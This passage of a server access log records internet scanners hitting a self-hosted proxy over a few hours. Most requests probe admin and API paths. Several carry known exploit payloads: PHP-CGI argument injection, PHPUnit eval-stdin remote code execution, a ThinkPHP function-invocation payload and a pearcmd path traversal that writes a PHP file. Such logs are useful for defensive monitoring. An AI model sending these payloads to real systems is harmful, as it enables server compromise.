Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:08 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/nifi/" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:08 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/info.htm" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:08 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/nifi-api/flow/about" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:08 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/mailinspector/login.php" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:08 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/main/main.html" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:08 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/javascript/validation/OEM.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[17/Jan/2026:03:45:08 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/cgi-bin/meteobridge.cgi" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:08 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/api-description" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:08 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/v2" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:08 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/sys/en/neoclassic/login/login" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:08 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/monitor/index.php/auth/login" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:08 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/management/v1/cluster/state" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:08 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/sap/bc/ui2/flp" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:08 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/wp-content/plugins/post-smtp/readme.txt" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:08 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/ignite?cmd=version" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:08 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/browser/index.html" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:08 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/help/en_US/Content/utm/utmAdminGuide/WebAdmin.htm" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:08 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/api/v2.0/systeminfo" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:08 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/cgi-bin/getagent.cgi?type=s" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:09 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/api/system/status" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:09 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/nmc/rss/server" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:09 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/api/v1/cluster/summary" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:09 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/download/python/" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:09 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/ScadaBR/login.htm" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:09 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/admin" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:09 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/webpages/login.html" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:09 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/sms_mp/.sms_aut?mplist" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:09 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/angular.js" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:09 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/rest/settings" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:14 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 172.234.162.31] [Length 1033] [Gzip -] "-" "-" +[17/Jan/2026:03:45:15 +0000] 400 - GET http localhost "/" [Client 172.234.162.31] [Length 252] [Gzip -] "-" "-" +[17/Jan/2026:03:45:15 +0000] 200 - GET http 92-249-249-197.pool.digikabel.hu "/" [Client 172.234.162.31] [Length 1033] [Gzip -] "-" "-" +[17/Jan/2026:03:45:15 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/" [Client 172.234.162.31] [Length 252] [Gzip -] "-" "-" +[17/Jan/2026:03:45:50 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:04:01:04 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:04:03:16 +0000] 200 - GET http 92.249.249.197 "/" [Client 95.214.55.246] [Length 1033] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[17/Jan/2026:04:21:48 +0000] 200 - GET http 92.249.249.197 "/" [Client 3.130.96.91] [Length 568] [Gzip 1.86] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[17/Jan/2026:04:23:02 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.130.96.91] [Length 0] [Gzip -] "-" "-" +[17/Jan/2026:04:23:32 +0000] 200 - GET http 92.249.249.197 "/" [Client 3.130.96.91] [Length 568] [Gzip 1.86] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[17/Jan/2026:04:25:37 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:04:26:12 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.130.96.91] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:04:28:40 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.130.96.91] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:04:30:42 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.130.96.91] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:04:37:12 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:04:48:44 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 203.55.131.3] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:04:51:31 +0000] 404 - GET http 92.249.249.197 "/login" [Client 193.142.146.230] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[17/Jan/2026:04:51:57 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:04:52:11 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 180.76.172.156] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:04:52:11 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 180.76.172.156] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:04:52:20 +0000] 404 - POST http 92.249.249.197 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:52:20 +0000] 405 - POST http 92.249.249.197 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 180.76.172.156] [Length 154] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:52:24 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:52:25 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:52:26 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:52:27 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:52:37 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:52:37 +0000] 404 - GET http 92.249.249.197 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:52:37 +0000] 404 - GET http 92.249.249.197 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:52:38 +0000] 404 - GET http 92.249.249.197 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:52:39 +0000] 404 - GET http 92.249.249.197 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:52:39 +0000] 404 - GET http 92.249.249.197 "/phpunit/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:52:40 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:52:45 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:52:46 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:52:46 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:52:47 +0000] 404 - GET http 92.249.249.197 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:52:50 +0000] 404 - GET http 92.249.249.197 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:52:50 +0000] 404 - GET http 92.249.249.197 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:52:52 +0000] 404 - GET http 92.249.249.197 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:52:53 +0000] 404 - GET http 92.249.249.197 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:52:53 +0000] 404 - GET http 92.249.249.197 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:52:54 +0000] 404 - GET http 92.249.249.197 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:52:55 +0000] 404 - GET http 92.249.249.197 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:52:56 +0000] 404 - GET http 92.249.249.197 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:52:56 +0000] 404 - GET http 92.249.249.197 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:52:58 +0000] 404 - GET http 92.249.249.197 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:52:59 +0000] 404 - GET http 92.249.249.197 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:52:59 +0000] 404 - GET http 92.249.249.197 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:53:00 +0000] 404 - GET http 92.249.249.197 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:53:01 +0000] 404 - GET http 92.249.249.197 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:53:02 +0000] 404 - GET http 92.249.249.197 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:53:02 +0000] 404 - GET http 92.249.249.197 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:53:06 +0000] 404 - GET http 92.249.249.197 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:53:06 +0000] 404 - GET http 92.249.249.197 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:53:07 +0000] 404 - GET http 92.249.249.197 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:53:07 +0000] 404 - GET http 92.249.249.197 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:53:09 +0000] 404 - GET http 92.249.249.197 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:53:10 +0000] 404 - GET http 92.249.249.197 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:53:10 +0000] 404 - GET http 92.249.249.197 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:53:11 +0000] 404 - GET http 92.249.249.197 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:53:12 +0000] 403 - GET http 92.249.249.197 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:53:12 +0000] 403 - GET http 92.249.249.197 "/index.php?lang=../../../../../../../../tmp/index1" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:53:12 +0000] 404 - GET http 92.249.249.197 "/containers/json" [Client 180.76.172.156] [Length 150] [Gzip -] "libredtail-http" "-" +[17/Jan/2026:04:56:45 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:05:02:36 +0000] 200 - GET http 92.249.249.197 "/" [Client 64.62.156.94] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; OpenBSD amd64; rv:109.0) Gecko/20100101 Firefox/115.0" "-" +[17/Jan/2026:05:03:06 +0000] 404 - GET http 92.249.249.197 "/webui/" [Client 64.62.156.94] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[17/Jan/2026:05:04:43 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[17/Jan/2026:05:05:29 +0000] 404 - GET http 92.249.249.197 "/geoserver/web/" [Client 64.62.156.94] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; OpenBSD amd64; rv:109.0) Gecko/20100101 Firefox/115.0" "-" +[17/Jan/2026:05:05:34 +0000] 200 - GET http 92.249.249.197 "/" [Client 203.55.131.3] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36" "-" +[17/Jan/2026:05:17:59 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:05:27:30 +0000] 200 - GET http 92.249.249.197 "/" [Client 176.65.149.159] [Length 1033] [Gzip -] "-" "-" +[17/Jan/2026:05:36:59 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:05:41:24 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:05:46:13 +0000] 404 - GET http 92.249.249.197 "/robots.txt" [Client 91.232.238.106] [Length 150] [Gzip -] "xfa1" "-" +[17/Jan/2026:06:09:04 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:06:15:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 204.76.203.215] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:06:15:06 +0000] 400 - GET http localhost-nginx-proxy-manager "-" [Client 204.76.203.215] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:06:26:36 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.15] [Length 1033] [Gzip -] "Mozilla/1.0" "-" +[17/Jan/2026:06:27:54 +0000] 400 - GET http localhost "/" [Client 176.32.195.85] [Length 252] [Gzip -] "Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 630) like Gecko" "-" +[17/Jan/2026:06:28:30 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:06:28:56 +0000] 400 - GET http 92.249.249.197 "/" [Client 95.215.0.144] [Length 252] [Gzip -] "fasthttp" "-" +[17/Jan/2026:06:28:58 +0000] 400 - GET http 92.249.249.197 "/aaa9" [Client 95.215.0.144] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[17/Jan/2026:06:28:58 +0000] 400 - GET http 92.249.249.197 "/aab9" [Client 95.215.0.144] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[17/Jan/2026:06:29:15 +0000] 400 - GET http 92.249.249.197 "/aaa9" [Client 46.161.50.108] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[17/Jan/2026:06:29:15 +0000] 400 - GET http 92.249.249.197 "/aab9" [Client 46.161.50.108] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[17/Jan/2026:06:31:30 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.46] [Length 1033] [Gzip -] "-" "-" +[17/Jan/2026:06:31:42 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:06:32:16 +0000] 400 - GET http 92.249.249.197 "/" [Client 3.134.148.59] [Length 654] [Gzip -] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[17/Jan/2026:06:34:06 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:06:34:47 +0000] 400 - - http localhost "-" [Client 3.134.148.59] [Length 0] [Gzip -] "-" "-" +[17/Jan/2026:06:35:05 +0000] 400 - GET http 92.249.249.197 "/" [Client 3.134.148.59] [Length 654] [Gzip -] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[17/Jan/2026:06:38:40 +0000] 400 - - http localhost "-" [Client 3.134.148.59] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:06:48:29 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:06:56:15 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[17/Jan/2026:06:57:00 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:07:00:12 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 83.142.209.181] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:07:06:17 +0000] 404 - POST http 92.249.249.197 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 192.159.99.95] [Length 0] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[17/Jan/2026:07:06:17 +0000] 200 - GET http 92.249.249.197 "/" [Client 